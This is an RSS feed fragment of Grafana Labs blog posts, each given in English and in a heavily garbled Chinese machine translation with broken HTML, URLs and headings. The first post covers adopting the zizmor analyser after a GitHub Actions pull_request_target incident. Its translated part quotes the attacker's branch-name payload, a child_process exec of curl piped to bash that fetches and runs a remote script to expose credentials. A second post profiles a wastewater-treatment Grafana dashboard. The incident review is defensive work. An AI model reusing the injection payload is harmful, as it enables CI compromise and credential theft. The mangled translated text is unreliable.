Ruleset configuration for zizmor workflow&#34;width=&#34;1898&#34;height=&#34;588&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;Once we enable the check (in evaluation mode initially) we start to see workflow runs being expected on existing and new PRs. It’s worth noting that GitHub’s system requires &lt;strong&gt;existing&lt;/strong&gt; PRs to either be closed and re-opened or to have an empty commit pushed to the branch.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 1672px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/zizmor/zizmor-check.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/zizmor/zizmor-check.png&#34;data-srcset=&#34;/media/blog/zizmor/zizmor-check.png?w=320 320w, /media/blog/zizmor/zizmor-check.png?w=550 550w, /media/blog/zizmor/zizmor-check.png?w=750 750w, /media/blog/zizmor/zizmor-check.png?w=900 900w, /media/blog/zizmor/zizmor-check.png?w=1040 1040w, /media/blog/zizmor/zizmor-check.png?w=1240 1240w, /media/blog/zizmor/zizmor-check.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;Zizmor check expecting result in repository&#34;width=&#34;1672&#34;height=&#34;188&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/zizmor/zizmor-check.png&#34;&#xA;alt=&#34;Zizmor check expecting result in repository&#34;width=&#34;1672&#34;height=&#34;188&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;h2 id=&#34;challenges-with-zizmor&#34;&gt;Challenges with Zizmor&lt;/h2&gt;&#xA;&lt;p&gt;No implementation is without challenges, and we’ve certainly had a couple of them while implementing Zizmor across our software estate. Two notable challenges are detailed here.&lt;/p&gt;&#xA;&lt;h3 id=&#34;1-rate-limiting&#34;&gt;1. Rate limiting&lt;/h3&gt;&#xA;&lt;p&gt;Firstly, GitHub’s rate limiting of repository and application tokens causes some headaches when running the online checks that Zizmor can do. This is down to the fact that Zizmor uses the GitHub API to fetch the tags and branches for a given action. When this is done at scale, and on large projects, you quickly hit GitHub’s 15,000 calls per hour. It looks like the maintainer has already started thinking about this use case in&#xA;&lt;a href=&#34;https://github.com/zizmorcore/zizmor/issues/764&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;this issue&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;h3 id=&#34;2-centralized-ruleset-configuration&#34;&gt;2. Centralized ruleset configuration&lt;/h3&gt;&#xA;&lt;p&gt;We’ve also run into another GitHub issue — running Zizmor as a centralized ruleset in GitHub requires us to define the Zizmor configuration ahead of time. We want to define this as a git blob right next to the workflow; however, we need to be able to use the GitHub &lt;code&gt;id-token: write&lt;/code&gt; permission. In our first-party repositories, this is fine. However, GitHub rightly restricts this from being run in a fork, which makes grabbing the default configuration hard to get. One of the work arounds that we used for this is to define a &lt;code&gt;.github/zizmor.yml&lt;/code&gt; file in the repositories that we get a lot of traction from. If there is no file present, we also fall back to the built-in Zizmor configuration.&lt;/p&gt;&#xA;&lt;h2 id=&#34;summary&#34;&gt;Summary&lt;/h2&gt;&#xA;&lt;p&gt;In summary, we love Zizmor at Grafana Labs. It will help us prevent attacks in the future with a relatively lightweight binary running. We’ve opted to run in an offline mode for PRs due to online mode consuming our rate limit. This means that we don’t benefit from all the checks that Zizmor offers, such as&#xA;&lt;a href=&#34;https://docs.zizmor.sh/audits/#impostor-commit&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;imposter-commits&lt;/a&gt; and&#xA;&lt;a href=&#34;https://docs.zizmor.sh/audits/#ref-confusion&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;ref-confusion&lt;/a&gt;, but this does mean we can run it fast and that we don’t hit the GitHub API rate limit quickly.&lt;/p&gt;&#xA;&lt;p&gt;We did, however, opt to run the additional checks on a scheduled job against some of our most popular repositories (currently the LGTM stack repos). And the next time a GitHub Actions vulnerability appears in the wild, we’ll be more prepared with Zizmor checking our workflow hygiene.&lt;/p&gt;】&lt;p&gt;正如我们先前在2025年4月26日报道的那样，我们有一个&#xA;&lt;a href =“/blog/2025/04/27/grafana-security-update-no-customer-impact-gitrom-github-github-workflow-vulnerability/“&gt;安全事件&lt;/a&gt;通过Insecure github Action，我们自此发表了&#xA;&lt;a href =“/blog/2025/05/15/grafana-security-update-post-incent-indent-indent-indident-indist-indist-review for-github-workflow-vulnerabily-vulnerability-and-whats-next/”&gt; in Incistion评论&lt;/a&gt;。我们已经确认没有代码修改，未经授权访问生产系统，客户数据的曝光或访问个人信息。 &lt;/p&gt;&#xA;&lt;p&gt;鉴于这一事件以及我们为硬化基础设施和管道加强的努力的一部分，我们在CI/CD管道中引入了Zizmor，以供所有存储库检测并防止潜在脆弱的GitHub动作。 &lt;/p&gt;&#xA;&lt;p&gt; Zizmor是William Woodruff开发的开源静态分析工具，Grafana Labs正在与Woodruff合作作为Zizmor Project的赞助商。在我们深入了解如何部署Zizmor的细节之前，让我们首先谈论攻击者对我们使用的脆弱性。&lt;/p&gt;&#xA;&lt;h2 id =“关于github动作脆弱性&lt;/h2&gt;&#xA;&lt;p&gt;在Grafana Labs，我们使用GitHub动作作为主要&#xA;&lt;a href =“ https://aws.amazon.com/devops/continuul-integration/” target =“ _ blank” rel =“ noopener noreferrer”&gt;连续集成&lt;/a&gt;系统，我们使我们的团队能够构建和测试他们开发的代码。 GitHub操作使团队能够定义自己的可重复的构建和测试过程，这些构建和测试过程与他们编写的代码并肩运行，然后可以由内部的一系列事件触发。&lt;/p&gt;&#xA;&lt;p&gt;利用拉普特目标而不是更安全的plup-要求，这是一个脆弱的github动作，导致4月份的安全事件。这使未经授权的用户可以在受信任的环境中从恶意分支执行代码。通过将其分支命名以触发命令（本质上是使用&lt;code&gt;（&#39;child_process&#39;）。exec（&#39;curl $（ifs）-pathtofile $（ifs）bash&#39;&lt;/code&gt;）攻击者能够运行一个远程脚本。此脚本然后裸露了脚本，然后裸露了包括凭据的环境变量，包括信任的环境。&lt;/p&gt; &lt;/p&gt; &lt;/p&gt; &lt;/p&gt; &lt;/p&gt; &lt;/p。&#xA;&lt;p&gt;我们为我们的主动安全措施按计划激活了我们的主动安全措施感到自豪。我们的金丝雀代币在尝试使用时提醒我们。由于Grafana Labs拥有全球分布的劳动力，因此我们有工程师几乎立即登上了我们的警报，并且我们能够跨团队和时区协调工作，以快速，果断地关闭凭据，访问，行动和自动化。&lt;/p&gt;&gt; &lt;/p&gt;。&lt;/p&gt;&#xA;&lt;p&gt;我们对2025年5月12日结束的事件的调查，&lt;strong&gt;我们确认没有代码修改，未经授权访问生产系统，暴露于客户数据或访问个人信息。&lt;/strong&gt; &lt;/p&gt; &lt;/strong&gt; &lt;/p&gt;&#xA;&lt;H2 ID =“介绍-Zizmor”&gt;介绍Zizmor &lt;/h2&gt;&#xA;&lt;p&gt;现在，我们对问题有共同的了解，让我们深入了解如何前面将来出现的问题。在其他法规领域，我们经常采用静态分析来检测共同的漏洞或弱点（&#xA;&lt;a href =“ https://cwe.mitre.org/” target =“ _ blank” rel =“ noopener noreferrer”&gt; cwes &lt;/a&gt;）。有几个工具可用于静态分析GitHub动作。 Github自己的&#xA;&lt;a href =“ https://github.blog/security/security/application-security/how-to-secure-your-your-github-actions-workflows-with-with-codeql/” target =“ _ black” rel =“ noopener noreferrer”&gt; codeql &lt;/a&gt;能够检测到一定的攻击。还有STEP Security的硬性跑步者，这使团队能够对他们跑步时的行动进行更深入的检查。但是，我们在整个遗产中使用的工具是开源项目Zizmor。&lt;/p&gt;&#xA;&lt;p&gt;为了减轻GitHub的行动事件，不仅是Grafana Labs的安全团队，而且还在整个工程部门进行了巨大的努力，以对抗我们在存储库中的所有GitHub行动。 Zizmor拾取不仅使用`plul_request_target`使用了&#xA;&lt;a href =“ https://docs.zizmor.sh/audits/” target =“ _ blank” rel =“ noopener noreferrer”&gt;审核规则&lt;/a&gt;，例如Forbidden-uses和undinned-uses。&lt;/p&gt;&gt; &lt;/p&gt;&#xA;&lt;p&gt;之后&#xA;&lt;a href=&#34;https://www.wiz.io/blog/new-github-action-supply-chain-attack-reviewdog-action-setup&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;tj-actions incident&lt;/a&gt; with reviewdog, in which a third-party supply chain attack was introduced targeting specific repositories,  Grafana Labs’安全团队决定限制对审查doce行动的使用。将Zizmor与禁止使用一起使用，使我们还可以将技术块放入技术块中，以防止在我们的存储库中使用这组操作。为了防止将未来的攻击用新的提交覆盖标签，Zizmor还审核了使用未添加的动作版本，而是更喜欢用YAML评论的明确提交对其与之相关的标签。&lt;/p&gt;。&#xA;&lt;h2 id =“ zizmor-- grafana-labs”&gt; Zizmor + Grafana Labs &lt;/h2&gt;&#xA;&lt;p&gt;现在，我们已经了解了问题，即我们可以用来防止问题的工具，那么我们如何在Grafana Labs使用此问题？我们开始&#xA;&lt;a href =“ https://github.com/grafana/shared-workflows/blob/main/.github/.github/workflows/reusable-zizmor.yml” target =“ _ black” rel =“ r =” noopener noreferrer“利用github动作。&lt;/p&gt;&#xA;&lt;p&gt;可重复使用的工作流程有几件事。首先，它试图建立我们在该存储库中公开定义的Zizmor配置。这是我们使用的&lt;strong&gt;默认值&lt;/strong&gt;，但是如果存储库定义了自己的配置，则不会使用它，除非您当然设置&lt;code&gt;始终使用deft-default-config参数&lt;/code&gt;。然后它运行Zizmor，两次 - 一次生产&#xA;&lt;a href =“ https://sarifweb.azurewebsites.net/” target =“ _blank” rel =“ noopener noreferrer”&gt; sarif报告&lt;/a&gt;，另一个以人类可读的评论表格。然后，我们尝试将SARIF版本上传到GitHub代码扫描中。 （&lt;em&gt;注意：如果您的存储库是公开的，这是免费的。&lt;/em&gt;）最终，工作流根据Zizmor运行的结果决定其退出状态，这将为GitHub Action Check Check Status提供信息。&lt;/p&gt;&#xA;&lt;p&gt;这很棒，但是我们希望以2,000多个存储库来运行此功能，并且我们不想更新每个存储库以指向此存储库。进入&#xA;&lt;a href =“ https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-organization-erganization-creating-rulesets-rulesets-for-repositories-for-repositories-in-your-organization-in-your-organization” target =“ _ blank”这些就像可以应用于单个存储库的规则集，但是您可以将它们应用于组织中的所有存储库。&lt;/p&gt;&#xA;&lt;p&gt;很棒的事情是，我们只需要定义一次工作流程即可。我们选择在&#xA;&lt;a href =“ https://github.com/grafana/security-github-actions/blob/main/.github/workflows/selp-zizmor.yaml” target =“ _ blank” rel =“ rel =” noopener noreferrer&#39;存储库。在这里，我们可以定义我们希望此工作流程运行，固定版本的参数，并定义我们期望从工作流程中运行的其他行为。在此示例中，我们检查在运行Zizmor之前是否存在任何工作流程。 （毫无意义地将其与零目标运行！）&lt;/p&gt;&#xA;&lt;p&gt;既然我们有了一个措施，我们就可以使用规则集将其推广到我们组织中的所有存储库。我们使用“需要工作流程在合并之前通过”检查以从安全控制的存储库中定义。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：1898px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/blog/zizmor/prureet-configuration-zizmor.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/blog/zizmor/prureet-configuration-zizmor.png” data-srcset =“/媒体/blog/zizmor/zizmor/zizmor/prounet-configuration-zizmor.png？ /media/blog/zizmor/ruleset-configuration-zizmor.png?w=750 750w, /media/blog/zizmor/ruleset-configuration-zizmor.png?w=900 900w, /media/blog/zizmor/ruleset-configuration-zizmor.png?w=1040 1040W，/media/blog/zizmor/ruleset-configuration-zizmor.png?w=1240 1240W，/media/Blog/Zizmor/Ruleset-Configuration-configuration-zizmor.png?w=1920192010w“&#xA;data-sizes =“ auto” alt =“ zizmor workflow的github branch规则集配置” width =“ 1898” height =“ 588”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/blog/zizmor/prureet-configuration-zizmor.png”&#xA;alt = Zizmor工作流的GitHub分支规则集配置“ width =“ 1898”高度=“ 588”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;p&gt;一旦我们启用检查（最初是在评估模式下），我们就会开始看到现有和新PR的工作流程。值得注意的是，GitHub的系统需要&lt;strong&gt;现有的&lt;/strong&gt; PR才能关闭并重新开放或将空的提交推向分支。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：1672px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/blog/zizmor/zizmor-check.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/blog/zizmor/zizmor-check.png” data-srcset =“/媒体/blog/zizmor/zizmor/zizmor-check.png？ /Media/blog/zizmor/zizmor-check.png?w=750 750W，/media/Blog/Zizmor/Zizmor/Zizmor-Check.png?w=900 900W，/media/Media/Blog/Zizmor/Zizmor/Zizmor/Zizmor-Check.png?w=900 /Media/blog/zizmor/zizmor-check.png?w=1240 1240W，/media/Blog/Zizmor/Zizmor/Zizmor-Check.png?w=19201920w“&#xA;data-sizes =“ auto” alt =“ zizmor检查预期在存储库中的预期结果” width =“ 1672” height =“ 188”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/博客/zizmor/zizmor-check.png”&#xA;alt =“ Zizmor检查预期结果”存储库“ width =” 1672“高度=” 188“/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;H2 ID =“挑战 -  Zizmor”&gt; Zizmor &lt;/h2&gt;挑战&#xA;&lt;p&gt;没有任何实施没有挑战，我们当然有几个在我们的软件遗产中实施Zizmor的同时。这里详细介绍了两个值得注意的挑战。&lt;/p&gt;&#xA;&lt;H3 ID =“ 1速率限制”&gt; 1。费率限制&lt;/h3&gt;&#xA;&lt;p&gt;首先，GitHub对存储库和应用程序令牌的速率限制在运行Zizmor可以做的在线检查时会引起一些头痛。这要归功于Zizmor使用GitHub API来获取标签和分支以进行给定动作。当大规模完成此操作时，在大型项目上，您很快就会每小时打15,000个电话。看来维护者已经开始考虑这种用例&#xA;&lt;a href =“ https://github.com/zizmorcore/zizmor/issues/764” target =“ _ blank” rel =“ noopener noreferrer”&gt;此问题&lt;/a&gt;。&lt;/a&gt;。&lt;/p&gt;&#xA;&lt;H3 ID =“ 2-居中的符号 - 构造”&gt; 2。集中规则集配置&lt;/h3&gt;&#xA;&lt;p&gt;我们还遇到了另一个GitHub问题 - 在Github中运行Zizmor作为集中式规则集要求我们提前定义Zizmor配置。我们想将其定义为工作流程旁边的git斑点。但是，我们需要能够使用github &lt;code&gt; id-token：write &lt;/code&gt;权限。在我们的第一方存储库中，这很好。但是，Github正确地将其限制在叉子中运行，这使得难以获得默认配置。我们为此使用的围绕的工作之一是定义&lt;code&gt; .github/zizmor.yml.yml &lt;/code&gt;在存储库中我们得到很多吸引力的文件。如果没有文件，我们也落回内置的Zizmor配置。&lt;/p&gt;&#xA;&lt;H2id =“摘要”&gt;摘要&lt;/h2&gt;&#xA;&lt;p&gt;总而言之，我们喜欢Grafana Labs的Zizmor。它将帮助我们通过相对轻巧的二进制运行来防止攻击。由于在线模式消耗了我们的费率限制，因此我们选择在离线模式下以PRS进行运行。这意味着我们不会从Zizmor提供的所有检查中受益，例如&#xA;&lt;a href =“ https://docs.zizmor.sh/audits/#impostor-commit” target =“ _ blank” rel =“ noopener noreferrer”&gt; imposter-commits &lt;/a&gt;&#xA;&lt;a href =“ https://docs.zizmor.sh/audits/#ref-confusion” target =“ _ blank” rel =“ noopener noreferrer”&gt; ref-confusion &lt;/a&gt;，但这确实意味着我们可以快速运行它，并且我们不会快速达到Github api率限制。&#xA;&lt;p&gt;但是，我们选择了针对一些最受欢迎的存储库（当前是LGTM堆栈存储库）对计划作业进行的额外检查。下次GitHub动作漏洞出现在野外时，我们将为Zizmor做好准备，以检查我们的工作流卫生。&lt;/p&gt;</description>
      <pubDate>Thu, 26 Jun 2025 00:00:00 +0000</pubDate>
    </item>
    <item>
      <title>【Going with the flow: How one Golden Grot Awards winner monitors wastewater with Grafana】顺其自然：一个金色鸡蛋奖奖奖得主监视器与格拉法纳（Grafana）</title>
      <link>https://grafana.com/blog/2025/06/20/going-with-the-flow-how-one-golden-grot-awards-winner-monitors-wastewater-with-grafana/</link>
      <description>【&lt;p&gt;What do pumps, protozoa, and Python have in common? In the city of Morro Bay, California, they all come together in one innovative (and, now, award-winning) Grafana dashboard.&lt;/p&gt;&#xA;&lt;p&gt;Grant Chase, operational technology specialist and winner of the&#xA;&lt;a href=&#34;/golden-grot-awards/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;2025 Golden Grot Awards&lt;/a&gt; in the professional category, didn’t just build a dashboard — he built a data-driven command center for an entire wastewater treatment operation. And yes, it even includes video footage of microscopic creatures.&lt;/p&gt;&#xA;&lt;p&gt;“The engineering team was floored that there was a platform that made data that accessible and that easy for them,” Grant said during an interview at&#xA;&lt;a href=&#34;/events/grafanacon/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;GrafanaCON 2025&lt;/a&gt; last month. “There&amp;rsquo;s something so gratifying about when an incident happens and the team goes, &amp;lsquo;Let&amp;rsquo;s go check Grafana and find out what happened.&amp;rsquo; They view it as a true resource and as a true tool to help solve problems.”&lt;/p&gt;&#xA;&lt;p&gt;Read on to learn more about Grant’s epic dashboard, and check out our interview with him in the video below.&lt;/p&gt;&#xA;&lt;div&#xA;class=&#34;youtube-lazyload responsive-video&#34;&#xA;data-embed=&#34;wucMZ9tb1I0&#34;&#xA;data-url=&#34;https://www.youtube.com/embed/wucMZ9tb1I0?autoplay=1&amp;amp;rel=0&#34;&#xA;data-title=&#34;YouTube Video&#34;&#xA;&gt;&#xA;&lt;div class=&#34;play-button&#34;&gt;&lt;/div&gt;&#xA;&lt;/div&gt;&#xA;&lt;h2 id=&#34;how-it-started-vs-how-its-flowing&#34;&gt;How it started vs. how it’s flowing &lt;/h2&gt;&#xA;&lt;p&gt;Before&#xA;&lt;a href=&#34;/oss/grafana/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana&lt;/a&gt;, Morro Bay’s wastewater treatment system was running on decades-old technology. When Grant first joined the team in 2019, one of the lead operators showed him a browser window used to track two key metrics: one related to treatment process control and another to efficiency. Grant immediately noticed the solution was static, low-resolution, and antiquated. &lt;/p&gt;&#xA;&lt;p&gt;“It turned out to just be a snapshot of a really bad graph,” he recalled.&lt;/p&gt;&#xA;&lt;p&gt;That’s when the lightbulb went off. Grant quickly pulled together a custom solution using Python and a&#xA;&lt;a href=&#34;https://www.rtautomation.com/technologies/modbus-tcpip/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Modbus TCP&lt;/a&gt; industrial library to tap into the raw data from the treatment plant. He fed that data into InfluxDB, but needed a way to visualize it. &lt;/p&gt;&#xA;&lt;p&gt;“Grafana turned out to be the answer,” Grant explained. “We had our two metrics, and they were beautifully visualized in Grafana. That was our first exposure to Grafana, and it really changed our ability to have visualizations.”&lt;/p&gt;&#xA;&lt;p&gt;That initial Grafana dashboard ended up laying the groundwork for something much bigger. When the city of Morro Bay decommissioned its aging wastewater treatment plant and brought a brand-new facility online, the expectation was that modern, built-in software would cover everything the team needed.&lt;/p&gt;&#xA;&lt;p&gt;Spoiler alert: it didn’t.&lt;/p&gt;&#xA;&lt;p&gt;“It quickly became apparent that the engineers were asking for data sets that were available in the database but not visualized anywhere, and they weren&amp;rsquo;t part of the scope of work for that particular contractor building the system,” Grant said. “So we needed to quickly pivot, and I already had in my tool bag something that I knew would work well, and that was Grafana.” &lt;/p&gt;&#xA;&lt;p&gt;From there, Grant spun up a Grafana instance for the new wastewater treatment plant and built out a dashboard for “every single process area with every single piece of data.” &lt;/p&gt;&#xA;&lt;h2 id=&#34;the-winning-dashboard-a-navigational-springboard&#34;&gt;The winning dashboard: A &amp;rsquo;navigational springboard&amp;rsquo;&lt;/h2&gt;&#xA;&lt;p&gt;Ultimately, Grant built a real-time, highly contextual dashboard that’s become the go-to resource for operators, engineers, and lab staff alike at the new treatment plant. At the heart of this award-winning dashboard is a homepage designed with purpose: a left-to-right visual journey of wastewater treatment, intended to be a “navigational springboard” for users.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 2544px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/golden-grots-2025-voting/grant-chase-dashboard.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/golden-grots-2025-voting/grant-chase-dashboard.png&#34;data-srcset=&#34;/media/blog/golden-grots-2025-voting/grant-chase-dashboard.png?w=320 320w, /media/blog/golden-grots-2025-voting/grant-chase-dashboard.png?w=550 550w, /media/blog/golden-grots-2025-voting/grant-chase-dashboard.png?w=750 750w, /media/blog/golden-grots-2025-voting/grant-chase-dashboard.png?w=900 900w, /media/blog/golden-grots-2025-voting/grant-chase-dashboard.png?w=1040 1040w, /media/blog/golden-grots-2025-voting/grant-chase-dashboard.png?w=1240 1240w, /media/blog/golden-grots-2025-voting/grant-chase-dashboard.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A screenshot of the Grafana dashboard Grant Chase built for the city of Morro Bay wastewater treatment plant.&#34;width=&#34;2544&#34;height=&#34;1428&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/golden-grots-2025-voting/grant-chase-dashboard.png&#34;&#xA;alt=&#34;A screenshot of the Grafana dashboard Grant Chase built for the city of Morro Bay wastewater treatment plant.&#34;width=&#34;2544&#34;height=&#34;1428&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;“Each column represents a process area, and below that are navigational buttons that let you go deeper into that particular part of the system.”&lt;/p&gt;&#xA;&lt;p&gt;The dashboard helps teams visualize data from hundreds of sensors, motors, analyzers, and off-site lift stations. It dynamically adjusts data resolution for second-by-second accuracy, integrates lab data for compliance monitoring, and even includes embedded video feeds of the microorganisms found in the basin.&lt;/p&gt;&#xA;&lt;p&gt;“That really creates a complete, or more complete, data model for us,” Grant said. “We know what the process is, what the samples were like, and what microorganisms were observed at a given period of time.”&lt;/p&gt;&#xA;&lt;h2 id=&#34;closing-thoughts-big-tents-and-aha-moments&#34;&gt;Closing thoughts: Big tents and &amp;lsquo;Aha&amp;rsquo; moments&lt;/h2&gt;&#xA;&lt;p&gt;For Grant, the real power of Grafana lies not just in the dashboards, but in the platform’s open, community-driven approach. Grafana’s “Big Tent” philosophy, he said, enabled the kind of creative problem-solving that led to exactly what his team needed.&lt;/p&gt;&#xA;&lt;p&gt;“As a developer, I’m constantly limited by software,” he said. “So having software that allows me to continue to innovate and to serve the needs of my team is the biggest &amp;lsquo;Aha&amp;rsquo; moment, for sure.”&lt;/p&gt;】&lt;p&gt;泵，原生动物和Python有什么共同点？在加利福尼亚州莫罗湾市，他们都以一种创新（现在是屡获殊荣的）Grafana仪表板聚集在一起。&lt;/p&gt;&#xA;&lt;p&gt; Grant Chase，运营技术专家，冠军&#xA;&lt;a href =“/golden-grot-awards/？pg = blog＆plcmt = body-txt”&gt; 2025 Golden Grot Awards &lt;/a&gt;在专业类别中，不仅建立了一个仪表板，还建立了一个数据驱动的指挥中心，为整个Wastewater处理操作建立了数据驱动的指挥中心。是的，它甚至包括微观生物的视频镜头。&lt;/p&gt;&#xA;&lt;p&gt;“工程团队被认为有一个平台使数据可以访问，这对他们来说很容易，”格兰特在接受采访时说&#xA;&lt;a href =“/events/grafanacon/？pg = blog＆plcmt = body-txt”&gt; grafanacon 2025 &lt;/a&gt;上个月。 “何时发生事件和团队进行，‘让我们去检查Grafana并找出发生了什么。&#39;他们将其视为真正的资源，是一个真正的工具来帮助解决问题。” &lt;/p&gt;&#xA;&lt;p&gt;请继续阅读以了解有关Grant的Epic仪表板的更多信息，并在下面的视频中查看我们对他的采访。&lt;/p&gt;&#xA;&lt;div&#xA;class =“ youtube-lazyload响应式video”&#xA;data-embed =“ wucmz9tb1i0”&#xA;data-url =“ https://www.youtube.com/embed/wucmz9tb1i0？autoplay = 1&amp;rel = 0”&#xA;数据标题=“ YouTube视频”&#xA;&gt;&#xA;&lt;div class =“ play-button”&gt; &lt;/div&gt;&#xA;&lt;/div&gt;&#xA;&lt;h2 id =“ how-it-it-start-vs-her-it-it-it-it-it-its-folding”&gt;它如何启动而不是如何流动&lt;/h2&gt;&#xA;&lt;p&gt;之前&#xA;&lt;a href =“/oss/grafana/？pg = blog＆plcmt = body-txt”&gt; grafana &lt;/a&gt;，莫罗湾的废水处理系统正在运行数十年历史的技术。当格兰特（Grant）于2019年首次加入该团队时，其中一位主要运营商向他展示了一个用于跟踪两个关键指标的浏览器窗口：一个与治疗过程控制有关，另一个与效率有关。格兰特立即注意到该解决方案是静态的，低分辨率和过时的。 &lt;/p&gt;&#xA;&lt;p&gt;“事实证明这只是一个非常糟糕的图表的快照，”他回忆说。&lt;/p&gt;&#xA;&lt;p&gt;那是灯泡熄灭的时候。格兰特迅速使用python和一个定制解决方案&#xA;&lt;a href =“ https://www.rtautomation.com/technologies/modbus-tcpip/” target =“ _ blank” rel =“ noopener noreferrer”&gt; modbus tcp &lt;/a&gt;工业图书馆从处理工厂中利用工业图书馆。他将这些数据馈送到InfluxDB中，但需要一种可视化数据的方法。 &lt;/p&gt;&#xA;&lt;p&gt;“格拉法纳原来是答案，”格兰特解释说。 “我们有两个指标，在格拉法纳（Grafana）进行了精美的可视化。&#xA;&lt;p&gt;最初的Grafana仪表板最终为更大的东西奠定了基础。当莫罗湾（Morro Bay）城市退役其老化的废水处理厂并在网上带来了全新的设施时，期望现代的内置软件将涵盖团队所需的一切。&lt;/p&gt;&#xA;&lt;p&gt;扰流板警报：&lt;/p&gt;没有。&lt;/p&gt;&#xA;&lt;p&gt;“很快就显而易见的是工程师S要求提供数据库中可用但在任何地方可视化的数据集，它们并不是该系统建造该系统的特定承包商工作范围的一部分。因此，我们需要快速旋转，而且我已经在工具袋中拥有一些我知道的东西，我知道的东西可以很好地工作，而且那是Grafana。” &lt;/p&gt;&#xA;&lt;p&gt;从那里开始，格兰特（Grant）为新的废水处理厂开了一个格拉法纳实例，并为“每个数据都有每个数据的每个过程区域建造了仪表板”。 &lt;/p&gt;&#xA;&lt;H2 ID =“获胜的仪表板-A-Navigational-Springboard”&gt;获胜仪表板：&#39;导航跳板&#39;&lt;/h2&gt;&#xA;&lt;p&gt;最终，格兰特（Grant）建立了一个实时的，高度的上下文仪表板，成为新治疗厂的运营商，工程师和实验室员工的首选资源。这款屡获殊荣的仪表板的核心是设计有目的的首页：废水处理的左右视觉旅程，旨在成为用户的“导航跳板”。&lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：2544px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/blog/golden-grots-2025-voting/grant-chase-dashboard.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/blog/golden-grots-2025-voting/grant-chase-dashboard.png” data-srcset =“/媒体/blog/blog/golden-grots-2025-voting/grant-chase-dashboard.png？w = 320 320 320w， /Media/blog/golden-grots-2025-voting/grant-chase-dashboard.png?w=550 550W，/media/Blog/golden-grots-2025-voting/grant-grant-chase-chase-dashboard.png？ /Media/blog/golden-grots-2025-voting/grant-chase-dashboard.png?w=900 900w，/media/Blog/golden-grots-2025-voting/grant-grant-chase-chase-dashboard.png？ /Media/blog/golden-grots-2025-voting/grant-chase-dashboard.png?w=1240 1240W，/media/Blog/golden-grots-2025-voting/grant-chase-chase-chase-dashboard.png？&#xA;data-sizes =“ auto” alt =“为莫罗湾（Morro Bay）废水处理厂建造的Grafana仪表板拨款Chase的屏幕截图。” width =“ 2544”高度=“ 